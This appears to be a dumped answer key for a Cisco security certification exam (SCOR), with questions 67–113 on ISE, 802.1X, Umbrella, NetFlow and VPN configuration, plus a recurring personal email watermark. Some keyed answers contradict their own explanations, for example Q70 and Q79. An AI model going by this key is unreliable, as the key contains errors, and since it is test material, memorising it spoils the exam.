In order to enable 802.1X on a port, we need two commands:


+ access-session port-control auto: enables 802.1X port-based authentication on the interface
+ dot1x pae {supplicant | authenticator | both}: sets the Port Access Entity (PAE) type. In this case
“authenticator” keyword was chosen so the interface acts only as an authenticator and does not respond
to any messages meant for a supplicant.+ authentication periodic: enables re-authentication on the
interface

We had both of these commands so 802.1X will work on the interface.

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_8021x/configuration/xe-
3se/3850/sec-user-8021x-xe-3se-3850-book/config-ieee-802x-pba.html

Other commands are explained below:

+ authentication host-mode multi-auth: allows voice and multiple endpoints on the same physical access
port
+ dot1x timeout tx-period 10: sets the retransmit period to 10 seconds
+ device-tracking attach-policy {policy-name}: applies the IP device tracking (IPDT) policy to switchport.
The main task is to keep track of connected hosts (association of MAC and IP address)

These commands enable the SNMP trap for added and removed MACs on the interface:
+ snmp trap mac-notification change added
+ snmp trap mac-notification change removed

Question 67

An engineer is configuring their router to send NetfFow data to Stealthwatch which has an IP address of
1.1.1.1 using the flow record Steathwatch406397954 command. Which additional command is
required to complete the flow record?
willsonliam55@gmail.com Skype Apple Kid

A. transport udp 2055


B. match ipv4 ttl
C. cache timeout active 60
D. destination 1.1.1.1

Answer: B

Explanation

The “transport udp …” command can only be used under flow exporter. The “cache timeout active …”
command can only be used under flow monitor.

Under flow record, we cannot type “destination 1.1.1.1”. This command can only be used under flow
exporter. We can only use the “match ipv4 ttl” command under flow record in this question.

Good reference: https://www.cisco.com/c/dam/en/us/td/docs/security/stealthwatch/netflow/config-


trouble-netflow-stealth.pdf

Question 68

An engineer needs to add protection for data in transit and have headers in the email message. Which
configuration is needed to accomplish this goal?

A. Provision the email appliance


B. Deploy an encryption appliance
C. Map sender IP addresses to a host interface
D. Enable flagged message handling

Answer: B

Question 69

An administrator is adding a new switch onto the network and has configured AAA for network access
control. When testing the configuration, the RADIUS authenticates to Cisco ISE but is being rejected. Why
is the ip radius source-interface command needed for this configuration?

A. Only requests that originate from a configured NAS IP are accepted by a RADIUS server
B. The RADIUS authentication key is transmitted only from the defined RADIUS source interface
C. RADIUS requests are generated only by a router if a RADIUS source interface is defined
D. Encrypted RADIUS authentication requires the RADIUS source interface be defined

Answer: A

Explanation

The source IP address of the RADIUS packets must match the NAS IP address configured on the RADIUS
server. A mismatch leads to RADIUS packet timeout and the server gets marked “DEAD”.

Reference: https://www.cisco.com/c/en/us/products/collateral/ios-nx-os-software/identity-based-
networking-services/whitepaper_C11-731907.html

Question 70

Refer to the exhibit.

interface GigabitEthernet1/0/18
switchport access vlan 41
switchport mode access
switchport voice vlan 44
device-tracking attach-policy IPDT_MAX_10
authentication periodic
willsonliam55@gmail.com Skype Apple Kid

authentication timer reauthenticate server


access-session host-mode multi-domain
access-session port-control auto
dot1x pae authenticator
dot1x timeout tx-period 7
dot1x max-reauth-req 3
spanning-tree portfast
service-policy type control subscriber POLICY_Gi1/0/18

A Cisco ISE administrator adds a new switch to an 802.1X deployment and has difficulty with some
endpoints gaining access. Most PCs and IP phones can connect and authenticate using their machine
certificate credentials. However printer and video cameras cannot based on the interface configuration
provided. What must be to get these devices on to the network using Cisco ISE for authentication and
authorization while maintaining security controls?

A. Change the default policy in Cisco ISE to allow all devices not using machine authentication
B. Enable insecure protocols within Cisco ISE in the allowed protocols configuration
C. Configure authentication event fail retry 2 action authorize vlan 41 on the interface
D. Add mab to the interface configuration

Answer: A

Question 71

What is the function of the crypto isakmp key cisc406397954 address 0.0.0.0 0.0.0.0 command
when establishing an IPsec VPN tunnel?

A. It defines what data is going to be encrypted via the VPN


B. It configures the pre-shared authentication key
C. It prevents all IP addresses from connecting to the VPN server.
D. It configures the local address for the VPN server.

Answer: B

Explanation

Note:
+ “address 0.0.0.0 0.0.0.0” means remote peer is any -> any destination can try to negotiate with this
router.
+ The Phase 1 password is “cisc406397954”.

Question 72

An engineer is adding a Cisco DUO solution to the current TACACS+ deployment using Cisco ISE. The
engineer wants to authenticate users using their account when they log into network devices. Which action
accomplishes this task?

A. Configure Cisco DUO with the external Active Directory connector and tie it to the policy set within Cisco
ISE
B. Install and configure the Cisco DUO Authentication Proxy and configure the identity source sequence
within Cisco ISE
C. Create an identity policy within Cisco ISE to send all authentication requests to Cisco DUO
D. Modify the current policy with the condition MFASourceSequence DUO=true in the authorization
conditions within Cisco ISE

Answer: B

Explanation

Duo MFA Integration with ISE for TACACS+ Device Administration with Local/Internal (ISE) Users
willsonliam55@gmail.com Skype Apple Kid

In this setup, ISE will forward the TACACS+ authentication requests to the Duo Authentication proxy. The
proxy will then punt the requests back to ISE for local user authentication. This can be a little bit confusing
but it is necessary for organizations that want to utilize the local user database on ISE and not relay on
external identity sources such as Active Directory, LDAP, etc. If the authentication is successful, the end
user/admin will be send a “DUO Push.” If the local ISE authentication fails, then the process will stop and
no “Duo Push” will occur.

1. Admin user initiates a shell connection to a network device where he/she uses Active Directory based
credentials
2. Network device forwards the request to the TACACS+ server (ISE)
3. ISE sends the authentication request to Duo’s Authentication Proxy
4. The proxy forwards the request back to ISE for the 1st factor authentication
5. ISE informs the Authentication Proxy if the local authentication was successful
6. Upon successful ISE authentication, the Authentication Proxy sends an authentication request to Duo
cloud for 2nd factor authentication
7. Duo cloud sends a “push” to the admin user
8. Admin user “approves” the “push”
9. Duo informs the Authentication Proxy of the successful push
10. Authentication proxy informs ISE of a successful Authentication
11. ISE Authorizes the admin user

Also according to this Cisco link, we need to configure “Identity Source Sequenc” in Cisco ISE:
willsonliam55@gmail.com Skype Apple Kid

Therefore answer B is the best choice.

Question 73

An organization is selecting a cloud architecture and does not want to be responsible for patch
management of the operating systems. Why should the organization select either Platform as a Service or
Infrastructure as a Service for this environment?

A. Platform as a Service because the customer manages the operating system


B. Infrastructure as a Service because the customer manages the operating system
C. Platform as a Service because the service provider manages the operating system
D. Infrastructure as a Service because the service provider manages the operating system

Answer: C

Explanation

We don’t want to manage the OS so we should choose PaaS or SaaS. But this question only wants to
compare between PaaS and IaaS so we must choose PaaS.
willsonliam55@gmail.com Skype Apple Kid

Question 74

How does a cloud access security broker function?

A. It is an authentication broker to enable single sign-on and multi-factor authentication for a cloud
solution
B. It integrates with other cloud solutions via APIs and monitors and creates incidents based on events
from the cloud solution
C. It acts as a security information and event management solution and receives syslog from other cloud
solutions
D. It scans other cloud solutions being used within the network and identifies vulnerabilities

Answer: B

Question 75

A Cisco AMP for Endpoints administrator configures a custom detection policy to add specific MD5
signatures. The configuration is created in the simple detection policy section, but it does not work. What
is the reason for this failure?

A. The administrator must upload the file instead of the hash for Cisco AMP to use
B. The MD5 hash uploaded to the simple detection policy is in the incorrect format
C. The APK must be uploaded for the application that the detection is intended
D. Detections for MD5 signatures must be configured in the advanced custom detection policies

Answer: D

Question 76

What is the difference between a vulnerability and an exploit?

A. A vulnerability is a hypothetical event for an attacker to exploit


B. A vulnerability is a weakness that can be exploited by an attacker
willsonliam55@gmail.com Skype Apple Kid

C. An exploit is a weakness that can cause a vulnerability in the network


D. An exploit is a hypothetical event that causes a vulnerability in the network

Answer: B

Explanation

A vulnerability is a weakness in a software system. And an exploit is an attack that leverages that
vulnerability.

Question 77

Which feature is leveraged by advanced antimalware capabilities to be an effective endpoint protection


platform?

A. big data
B. storm centers
C. sandboxing
D. blocklisting

Answer: C

Question 78

Which system facilitates deploying microsegmentation and multi-tenancy services with a policy-based
container?

A. SDLC
B. Docker
C. Lambda
D. Contiv

Answer: D

Explanation

Contiv is an open source project that allows you to deploy micro-segmentation policy-based services in
container environments. It offers a higher level of networking abstraction for microservices by providing a
policy framework. Contiv has built-in service discovery and service routing functions to allow you to scale
out services.

Reference: https://www.ciscopress.com/articles/article.asp?p=3004581&seqNum=2

Question 79

An engineer integrates Cisco FMC and Cisco ISE using pxGrid. Which role is assigned for Cisco FMC?

A. client
B. server
C. publisher
D. controller

Answer: C

Explanation

pxGrid stands for Platform Exchange Grid, and it is a technology that allows integrating multiple vendors
security products together and grouping them in an ecosystem domain. The main purpose of using pxGrid
is to share contextual data between the integrated partners.

pxGrid uses a built-in API in ISE and it is comprised of three main components which are the controller,
publisher and the subscriber. The controller is the core component to make everything working and as said
is going to be ISE. The publisher instead is the partner that has some contextual data to be shared with
willsonliam55@gmail.com Skype Apple Kid

the other partners. And finally the subscriber is the partner that is interested in parsing some contextual
data from the other partners.

Reference: https://bluenetsec.com/fmc-pxgrid-integration-with-ise/

In fact, according to figure 6-5 (which is posted below) of this


link https://www.ciscopress.com/articles/article.asp?p=2963461&seqNum=2,

FMC is a subscriber but we have no such option so the best answer here is “publisher”.

Question 80

A network security engineer must export packet captures from the Cisco FMC web browser while
troubleshooting an issue. When navigating to the address https://<FMC IP>/capure/CAPI/pcap/test.pcap,
an error 403: Forbidden is given instead of the PCAP file. Which action must the engineer take to resolve
this issue?

A. Disable the proxy setting on the browser


B. Disable the HTTPS server and use HTTP instead
C. Use the Cisco FTD IP address as the proxy server setting on the browser
D. Enable the HTTPS server for the device platform policy

Answer: D

Explanation

When you see this HTTP RESPONSE in a packet capture (PCAP), it’s likely that proxy is denying the
request.
To verify this, get a policy trace, and look for the exact HTTP REQUEST sent by the client, and match it
with the policy rules. You will find either a DENY or Denied by Exception result.
You can then modify the rule to allow this HTTP REQUEST, if appropriate.

Reference: https://knowledge.broadcom.com/external/article/167567/why-do-my-pcaps-show-an-http-
response-fr.html

Therefore we should modify the policy to allow HTTPS request.

Question 81

Which security solution protects users leveraging DNS-layer security?


willsonliam55@gmail.com Skype Apple Kid

A. Cisco Umbrella
B. Cisco ISE
C. Cisco ASA
D. Cisco FTD

Answer: A

Question 82

What is the result of the

ACME-Router(config)#login block-for 100 attempts 4 within 60

command on a Cisco IOS router?

A. After four unsuccessful log in attempts, the line is blocked for 100 seconds and only permit IP addresses
A are permitted in ACL 60
B. After four unsuccessful log in attempts, the line is blocked for 60 seconds and only permit IP addresses
C are permitted in ACL 100
C. If four log in attempts fail in 100 seconds, wait for 60 seconds to next log in prompt
D. If four failures occur in 60 seconds, the router goes to quiet mode for 100 seconds

Answer: D

Explanation

The following example shows how to configure your router to enter a 100 second quiet period if 15 failed
login attempts is exceeded within 100 seconds; all login requests will be denied during the quiet period
except hosts from the ACL “myacl.”

Router(config)# login block-for 100 attempts 15 within 100


Router(config)# login quiet-mode access-class myacl

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_cfg/configuration/xe-16/sec-usr-
cfg-xe-16-book/sec-login-enhance.html

Question 83

What is an advantage of network telemetry over SNMP pulls?

A. scalability
B. security
C. encapsulation
D. accuracy

Answer: A

Explanation

SNMP uses the pull model when retrieving data from a switch. This model cannot scale for today’s high-
density platforms, and offers very limited extensibility. The pull model is based on a client sending a
request to the switch, then the switch responds to that request. On average, network operators using
SNMP poll data every five to thirty minutes. But with today’s speeds and scale that’s not enough to
capture important network events.

These traditional models also impose limits like scale and efficiency -> So we can deduce network
telemetry is more scalable than SNMP pulls.

Reference: https://blogs.cisco.com/developer/its-time-to-move-away-from-snmp-and-cli-and-use-model-
driven-telemetry

Question 84
willsonliam55@gmail.com Skype Apple Kid

What is a benefit of using a multifactor authentication strategy?

A. It provides secure remote access for applications


B. It provides an easy, single sign-on experience against multiple applications
C. It protects data by enabling the use of a second validation of identity
D. It provides visibility into devices to establish device trust

Answer: C

Explanation

Multi-factor Authentication (MFA) is an authentication method that requires the user to provide two or
more verification factors to gain access to a resource. MFA requires means of verification that
unauthorized users won’t have.

Note: Single sign-on (SSO) is a property of identity and access management that enables users to
securely authenticate with multiple applications and websites by logging in only once with just one set of
credentials (username and password). With SSO, the application or website that the user is trying to
access relies on a trusted third party to verify that users are who they say they are.

Question 85

An engineer is trying to decide between using L2TP or GRE over IPsec for their site-to-site VPN
implementation. What must be understood before choosing a solution?

A. L2TP uses TCP port 47 and GRE over IPsec uses UDP port 1701.
B. GRE over IPsec cannot be used as a standalone protocol, and L2TP can.
C. GRE over IPsec adds its own header, and L2TP does not
D. L2TP is an IP packet encapsulation protocol, and GRE over IPsec is a tunneling protocol.

Answer: C

Explanation

L2TP uses UDP port 1701 while GRE use IP protocol 47 -> Answer A is not correct.

L2TP stands for Layer 2 Tunneling Protocol while GRE is a simple IP packet encapsulation protocol->
Answer D is not correct

This Oreilly link says: “It is unlikely that you will set up L2TP as a standalone protocol, as it has no
authentication and encryption on its own. The more likely scenario is setting up an L2TP/IPsec tunnel”. So
we understand that L2TP can be set up as a standalone protocol, but should not -> Answer B is not
correct.

The CCNP and CCIE Security Core SCOR 350-701 Official Cert Guide book says “the GRE protocol adds its
own header (4 bytes plus options) between the payload (data) and the delivery header” while the entire
L2TP packet, including payload and L2TP header, is sent within a User Datagram Protocol (UDP) datagram
-> Answer C is correct.

Question 86

What are two functionalities of northbound and southbound APIs within Cisco SDN architecture? (Choose
two.)

A. Southbound APIs are used to define how SDN controllers integrate with applications.
B. Northbound interfaces utilize OpenFlow and OpFlex to integrate with network devices.
C. Northbound APIs utilize RESTful API methods such as GET, POST, and DELETE.
D. Southbound interfaces utilize device configurations such as VLANs and IP addresses.
E. Southbound APIs utilize CLI, SNMP, and RESTCONF.

Answer: C E

Explanation
willsonliam55@gmail.com Skype Apple Kid

Northbound APIs are used to define how SDN controllers integrate with applications -> Answer A is not
correct.

OpenFlow and OpFlex are Southbound APIs -> Answer B is not correct.

Southbound APIs ultilize NETCONF, RESTCONF, SNMP, Telnet, SSH… -> Answer D is not correct while
answer E is correct.

Question 87

Which two solutions help combat social engineering and phishing at the endpoint level? (Choose two)

A. Cisco ISEN
B. Cisco Umbrella
C. Cisco DNA Center
D. Cisco TrustSec
E. Cisco Duo Security

Answer: B E

Question 88

A network engineer must migrate a Cisco WSA virtual appliance from one physical host to another physical
host by using VMware Motion. What is a requirement for both physical hosts?

A. The hosts must run different versions of Cisco Asyncos


B. The hosts must run Cisco AsyncOS 10.0 or greater
C. The hosts must have access to the same defined network
D. The hosts must use a different datastore than the virtual appliance

Answer: C

Explanation

Requirements:
+ Both physical hosts must have the same network configuration.
+ Both physical hosts must have access to the same defined network(s) to which the interfaces on the
virtual appliance are mapped.
+ Both physical hosts must have access to the datastore that the virtual appliance uses. This datastore
can be a storage area network (SAN) or Network-attached storage (NAS).
+ The Cisco Secure Email Virtual Gateway must have no mail in its queue.

Reference: https://www.cisco.com/c/dam/en/us/td/docs/security/content_security/virtual_appliances/Cisc
o_Content_Security_Virtual_Appliance_Install_Guide.pdf

Question 89

An engineer is implementing Cisco CES in an existing Microsoft Office 365 environment and must route
inbound email to Cisco CES addresses. Which DNS record must be modified to accomplish this task?
willsonliam55@gmail.com Skype Apple Kid

A. CNAME
B. МХ
C. DKIM
D. SPF

Answer: B

Explanation

In order to route inbound email to Cisco CES addresses we must change the MX record.

Reference: https://www.ciscolive.com/c/dam/r/ciscolive/emea/docs/2020/pdf/BRKSEC-3433.pdf

At this point, you are ready to cut over the domain through a Mail Exchange (MX) record change. Work
with your DNS administrator to resolve your MX records to the IP addresses for your Cisco Secure Email
Cloud instance as provided in your Cisco Secure Email welcome letter.

Reference: https://www.cisco.com/c/en/us/support/docs/security/cloud-email-security/214812-
configuring-office-365-microsoft-with.html

Question 90

Which method of attack is used by a hacker to send malicious code through a web application to an
unsuspecting user to request that the victims web browser executes the code?

A. buffer overflow
B. SQL injection
C. browser WGET
D. cross-site scripting

Answer: D

Question 91
willsonliam55@gmail.com Skype Apple Kid

What are two ways a network administrator transparently identifies users using Active Directory on the
Cisco WSA? (Choose two)

A. Create an LDAP authentication realm and disable transparent user identification


B. Deploy a separate eDirectory server, the client IP address is recorded in this server.
C. Create NTLM or Kerberos authentication realm and enable transparent user identification.
D. The eDirectory client must be installed on each client workstation
E. Deploy a separate Active Directory agent such as Cisco Context Directory Agent.

Answer: C E

Explanation

Consider the following when you identify users transparently using Active Directory:
+ Transparent user identification with Active Directory works with an NTLM or Kerberos authentication
scheme only. You cannot use it with an LDAP authentication realm that corresponds to an Active Directory
instance.
+ Transparent user identification works with the versions of Active Directory supported by an Active
Directory agent.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_01001.html

Question 92

Which endpoint solution protects a user from a phishing attack?

A. Cisco AnyConnect with Umbrella Roaming Security module


B. Cisco AnyConnect with Network Access Manager module
C. Cisco Identity Services Engine
D. Cisco AnyConnect with ISE Posture module

Answer: A

Explanation

Umbrella Roaming is a cloud-delivered security service for Cisco’s next-generation firewall. It protects your
employees even when they are off the VPN. No additional agents are required. Simply enable the Umbrella
functionality in the Cisco AnyConnect client. You’ll get seamless protection against malware, phishing, and
command-and-control callbacks wherever your users go.

Reference: https://www.cisco.com/c/en/us/products/security/umbrella/umbrella-roaming.html

Question 93

An engineer is configuring Cisco Umbrella and has an identity that references two different policies. Which
action ensures that the policy that the identity must use takes precedence over the second one?

A. Configure only the policy with the most recently changed timestamp.
B. Make the correct policy first in the policy order.
C. Configure the default policy to redirect the requests to the correct policy.
D. Place the policy with the most-specific configuration last in the policy order.

Answer: B

Question 94

Refer to the exhibit.


willsonliam55@gmail.com Skype Apple Kid

Which configuration item makes it possible to have the AAA session on the network?

A. aaa authorization network default group ise


B. aaa authorization exec default ise
C. aaa authentication login console ise
D. aaa authentication enable default enable

Answer: A

Explanation

+ The exhibit in this question shows a a successful MAB authorization for the MAC address (from the line
“Status: Authorized” the last line “mab Authc Success”) so we need the keyword “authorization” in our
AAA command.

+ The authorized device is a Microsoft WorkStation so we need the keyword “network” in our AAA
command.

->The command “aaa authorization network default group ise” is the correct answer. This command
configures network authorization via ISE.

Question 95

Refer to the exhibit.


willsonliam55@gmail.com Skype Apple Kid

What is the function of the Python script code snippet for the Cisco ASA REST API?

A. deletes a global rule from policies


B. obtains the saved configuration of the Cisco ASA firewall
C. changes the hostname of the Cisco ASA
D. adds a global rule into policies

Answer: D

Explanation

Reference: https://github.com/timwukp/Cisco-ASA-REST-
API/blob/master/POST__api_access_global_rules_input_loop.py

Question 96
willsonliam55@gmail.com Skype Apple Kid

Refer to the exhibit.

When creating an access rule for URL filtering, a network engineer adds certain categories and individual
URLs to block. What is the result of the configuration?

A. Only URLs for botnets with a reputation score of 3 will be allowed while the rest will be blocked
B. Only URLs for botnets with reputation scores of 1-3 will be blocked
C. Only URLs for botnets with reputation scores of 3-5 will be blocked
D. Only URLs for botnets with a reputation score of 3 will be blocked

Answer: B

Explanation

When you create a rule to Block traffic based on a reputation level, selection of a reputation level also
selects all of the reputation levels more severe than the level you originally selected. For example, if you
configure a rule to block Benign Sites with security risks (level 3), it also automatically blocks Suspicious
sites (level 2) and High risk (level 1) sites.

Reference: https://www.cisco.com/c/en/us/support/docs/security/firesight-management-center/118852-
technote-firesight-00.html

Question 97

What are two functionalities of SDN Northbound APIs? (Choose two)

A. Northbound APIs provide a programmable interface for applications to dynamically configure the
network.
B. Northbound APIs form the interface between the SDN controller and business applications.
C. Northbound APIs use the NETCONF protocol to communicate with applications.
D. Northbound APIs form the interface between the SDN controller and the network switches or routers.
E. OpenFlow is a standardized northbound API protocol.

Answer: A B

Explanation

Northbound APIs present an abstraction of network functions with a programmable interface for
applications to consume the network services and configure the network dynamically -> Answer A is
correct.

Northbound APIs usually use RESTful APIs to communicate with applications -> Answer C is not correct.
willsonliam55@gmail.com Skype Apple Kid

Southbound APIs form the interface between the SDN controller and the network switches or routers ->
Answer D is not correct.
OpenFlow and NETCONF are Southbound APIs used for most SDN implementations -> Answer E is not
correct.

Question 98

What must be enabled to secure SaaS-based applications?

A. two-factor authentication
B. end-to-end encryption
C. application security gateway
D. modular policy framework

Answer: A

Explanation

According to this link, we can use the following to secure SaaS-based applications:
+ Set up single sign-on (SSO) integrations
+ Use multi-factor authentication (MFA) -> Answer A is correct.
+ Install and integrate an identity governance solution
+ Stay up to date

Question 99

A Cisco ISE engineer configures Central Web Authentication (CWA) for wireless guest access and must
have the guest endpoints redirect to the guest portal for authentication and authorization. While testing
the policy, the engineer notices that the device is not redirected and instead gets full guest access. What
must be done for the redirect to work?

A. Create an advanced attribute setting of Cisco.cisco-gateway-id=guest within the authorization profile


for the authorization policy line that the unauthenticated devices hit.
B. Tag the guest portal in the CWA part of the Common Tasks section of the authorization profile for the
authorization policy line that the unauthenticated devices hit.
C. Add the DACL name for the Airespace ACL configured on the WLC in the Common Tasks section of the
authorization profile for the authorization policy line that the unauthenticated devices hit
D. Use the track movement option within the authorization profile for the authorization policy line that the
unauthenticated devices hit

Answer: C

Explanation

Using an Authorization Profile to Redirect Guest Endpoints to ISE


As explained in Understanding Guest Flow, when endpoints first access the network, they are
authenticated with MAB, and must be redirected to the Guest portal for authorization. ISE comes with a
willsonliam55@gmail.com Skype Apple Kid

built-in profile called Cisco_WebAuth that references a built-in self-registered Guest portal. The WLC and
switch require a preconfigured redirect ACL.

AireOS does not support downloadable ACLs. Therefore, ACLs must be configured locally on the wireless
controller (or access points in FlexConnect mode). The ACL names must match in both ISE and in AireOS.
The figure below indicates for a wireless guest:

Reference: https://community.cisco.com/t5/security-documents/ise-guest-access-prescriptive-
deployment-guide/ta-p/3640475

Question 100

What is a difference between Cisco AMP for Endpoints and Cisco Umbrella?

A. Cisco AMP for Endpoints prevents, detects, and responds to attacks before damage can be done, and
Cisco Umbrella provides the first line of defense against Internet threats.
B. Cisco AMP for Endpoints prevents connections to malicious destinations, and Cisco Umbrella works at
the file level to prevent the initial execution of malware.
C. Cisco AMP for Endpoints automatically researches indicators of compromise and confirms threats, and
Cisco Umbrella does not
D. Cisco AMP for Endpoints is a cloud-based service, and Cisco Umbrella is not

Answer: A

Question 101

What is the intent of a basic SYN flood attack?

A. to flush the register stack to re-initiate the buffers


B. to solicit DNS responses
C. to exceed the threshold limit of the connection queue
D. to cause the buffer to overflow

Answer: C
willsonliam55@gmail.com Skype Apple Kid

Explanation

A SYN flood (half-open attack) is a type of denial-of-service (DDoS) attack which aims to make a server
unavailable to legitimate traffic by consuming all available server resources. By repeatedly sending initial
connection request (SYN) packets, the attacker is able to overwhelm all available ports on a targeted
server machine, causing the targeted device to respond to legitimate traffic sluggishly or not at all.

Question 102

Which open standard creates a framework for sharing threat intelligence in a machine-digestible format?

A. OpenC2
B. OpenIoC
C. STIX
D. Cybox

Answer: B

Explanation

OpenIOC is an open framework, meant for sharing threat intelligence information in a machine-readable
format. It was developed by the American cybersecurity firm MANDIANT in November 2011. It is written in
eXtensible Markup Language (XML) and can be easily customized for additional intelligence so that incident
responders can translate their knowledge into a standard format. Organizations can leverage this format
to share threat-related latest Indicators of Compromise (IoCs) with other organizations, enabling real-time
protection against the latest threats.

Question 103

Which two methods must be used to add switches into the fabric so that administrators can control how
switches are added into DCNM for private cloud management? (Choose two)

A. PowerOn Auto Provisioning


B. Cisco Cloud Director
C. Seed IP
D. CDP AutoDiscovery
E. Cisco Prime Infrastructure

Answer: A C

Explanation

Cisco Data Center Network Manager (DCNM) offers network management system (NMS) support for
traditional or multiple-tenant LAN and SAN fabrics. Cisco DCNM uses PowerOn Auto Provisioning (POAP) to
automate the process of upgrading software images and installing configuration files on Cisco Nexus
switches that are being deployed in the network.

Reference: https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/prime-data-
center-network-manager/guide-c07-740626.html

Question 104

Which role is a default guest type in Cisco ISE?

A. Full-Time
B. Contractor
C. Yearly
D. Monthly

Answer: B

Explanation

Each guest account must be associated with a guest type. Guest types allow a sponsor to assign different
levels of access and different network connection times to a guest account. These guest types are
willsonliam55@gmail.com Skype Apple Kid

associated with particular network access policies. Cisco ISE includes these default guest types:
Contractor – Users who need access to the network for an extended amount of time, up to a year.
Daily – Guests who need access to the resources on the network for just 1 to 5 days.
Weekly – Users who need access to the network for a couple of weeks.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/1-
3/admin_guide/b_ise_admin_guide_13/b_ise_admin_guide_sample_chapter_01111.html

Question 105

An engineer configures new features within the Cisco Umbrella dashboard and wants to identify and proxy
traffic that is categorized as risky domains and may contain safe and malicious content. Which action
accomplishes these objectives?

A. Configure intelligent proxy within Cisco Umbrella to intercept and proxy the requests for only those
categories
B. Upload the threat intelligence database to Cisco Umbrella for the most current information on
reputations and to have the destination lists block them.
C. Create a new site within Cisco Umbrella to block requests from those categories so they can be sent to
the proxy device.
D. Configure URL filtering within Cisco Umbrella to track the URLs and proxy the requests for those
categories and below.

Answer: A

Explanation

The ‘greylist’ of risky domains is compromised of domains that host both malicious and safe content—we
consider these “risky” domains. These sites often allow users to upload and share content—making them
difficult to police, even for the admins of the site.

Reference: https://docs.umbrella.com/deployment-msp/docs/what-is-the-intelligent-proxy

In order to enable intelligent proxy, we need to use “Advanced Settings”:

Question 106

An administrator enables Cisco Threat Intelligence Director on a Cisco FMC. Which process uses STIX and
allows uploads and downloads of block lists?

A. consumption
B. editing
C. sharing
D. authoring
willsonliam55@gmail.com Skype Apple Kid

Answer: A

Question 107

Why is it important to have a patching strategy for endpoints?

A. so that functionality is increased on a faster scale when it is used


B. so that known vulnerabilities are targeted and having a regular patch cycle reduces risks
C. so that patching strategies can assist with disabling nonsecure protocols in applications
D. to take advantage of new features released with patches

Answer: B

Question 108

What is a description of microsegmentation?

A. Environments deploy a container orchestration platform, such as Kubernetes, to manage the application
delivery
B. Environments apply a zero-trust model and specify how applications on different servers or containers
can communicate
C. Environments implement private VLAN segmentation to group servers with similar applications
D. Environments deploy centrally managed host-based firewall rules on each server or container

Answer: B

Explanation

Zero Trust is a security framework requiring all users, whether in or outside the organization’s network, to
be authenticated, authorized, and continuously validated for security configuration and posture before
being granted or keeping access to applications and data. Zero Trust assumes that there is no traditional
network edge; networks can be local, in the cloud, or a combination or hybrid with resources anywhere as
well as workers in any location.

The Zero Trust model uses microsegmentation — a security technique that involves dividing perimeters
into small zones to maintain separate access to every part of the network — to contain attacks.

Question 109

Which security product enables administrators to deploy Kubernetes clusters in air-gapped sites without
needing Internet access?

A. Cisco Container Controller


B. Cisco Container Platform
C. Cisco Cloud Platform
D. Cisco Content Platform

Answer: B

Explanation

The ability to deploy Kubernetes clusters in air-gapped sites


Cisco Container Platform (CCP) tenant images contain all the necessary binaries and don’t need internet
access to function.

Reference: https://www.cisco.com/c/en/us/products/cloud-systems-management/container-
platform/index.html#~stickynav=3

Question 110

What are two functions of TAXII in threat intelligence sharing? (Choose two)

A. exchanges trusted anomaly intelligence information


B. determines how threat intelligence information is relayed
willsonliam55@gmail.com Skype Apple Kid

C. determines the “what” of threat intelligence


D. supports STIX information and allows users to describe threat motivations and abilities

Answer: A B

Explanation

In short, TAXII is about how parties communicate to exchange threat intelligence and STIX is about
describing that threat intelligence in a structured way.

Reference: https://logsentinel.com/blog/the-importance-of-threat-intelligence-sharing-through-taxii-and-
stix/?cookie-state-change=1639912854054

STIX states the “what” of threat intelligence, while TAXII defines “how” that information is relayed.

Reference: https://www.anomali.com/resources/what-are-stix-taxii

Question 111

An engineer must modify a policy to block specific addresses using Cisco Umbrella. The policy is created
already and is actively used by devices, using many of the default policy elements. What else must be
done to accomplish this task?

A. Create a destination list for addresses to be allowed or blocked


B. Use content categories to block or allow specific addresses
C. Add the specified addresses to the identities list and create a block action
D. Modify the application settings to allow only applications to connect to required addresses

Answer: A

Explanation

Content Categories – Allows you to block access to categories of websites – groupings of sites with
similarly themed content. For example, sports, gambling, or astrology…, not specific addresses -> Answer
B is not correct.

Application Settings – Allows you to block access to specific applications (not specific addresses). For
example, Netflix, Facebook, or Amazon -> Answer D is not correct.

Destination Lists allows you to create a unique list of destinations (for example, domain name or URL) to
which you can block or allow access -> Answer A is correct.

Reference: https://docs.umbrella.com/deployment-umbrella/docs/customize-your-policies-1

An identity list cannot be an address as Umbrella uses the following identities:Network, Network Device,
Roaming Computers, Mobile Devices, Chrome Book, Network Tunnel and WebUsers and Groups.

Reference: https://www.cisco.com/c/dam/en/us/solutions/collateral/enterprise/design-zone-
security/umbrella-design-guide.pdf

Question 112

Drag and drop the descriptions from the right onto the correct positions on the left.
willsonliam55@gmail.com Skype Apple Kid

Answer:

+ threat prevention and mitigation for known and unknown threats: NGIPS
+ real-time threat intelligence and security protection: Collective Security Intelligence
+ detection, blocking and remediation to protect the enterprise against targeted malware attacks: AMP
+ policy enforcement based on complete visibility of users and communication between virtual machines:
Full Context Awareness

Question 113

Refer to the exhibit.

All servers are in the same VLAN/Subnet. DNS Server-1 and DNS Server-2 must communicate with each
other, and all servers must communicate with default gateway multilayer switch. Which type of private
VLAN ports should be configured to prevent communication between DNS servers and the file server?

A. Configure GigabitEthernet0/1 as promiscuous port, GigabitEthernet0/2 as isolated port, and


GigabitEthernet0/3 and GigabitEthernet0/4 as community ports.

B. Configure GigabitEthernet0/1 as community port, GigabitEthernet0/2 as promiscuous port,


GigabitEthernet0/3 and GigabitEthernet0/4 as isolated ports.

C. Configure GigabitEthernet0/1 as promiscuous port, Gigabithernet0/2 as community port and


GigabitEthernet0/3 and GigabitEthernet0/4 as isolated ports.

D. Configure GigabitEthernet0/1 as community port, GigabitEthernet0/2 as isolated port, and


GigabitEthernet0/3 and GigabitEthernet0/4 as promiscuous ports.

Answer: A
willsonliam55@gmail.com Skype Apple Kid

Explanation

* Isolated: only communicate with promiscuous ports. Notice that it cannot even communicate with
another isolated port. Also, there can be only 1 isolated VLAN per PVLAN.
* Promiscuous: can communicate with all other ports. The default gateway is usually connected to this
port so that all devices in PVLAN can go outside.
* Community: can communicate with other members of that community and promiscuous ports but
cannot communicate with other communities. There can be multiple community VLANs per PVLAN.

Question 1
willsonliam55@gmail.com Skype Apple Kid

A Cisco ESA network administrator has been tasked to use a newly installed service to help create policy
based on the reputation verdict. During testing, it is discovered that the Cisco ESA is not dropping files
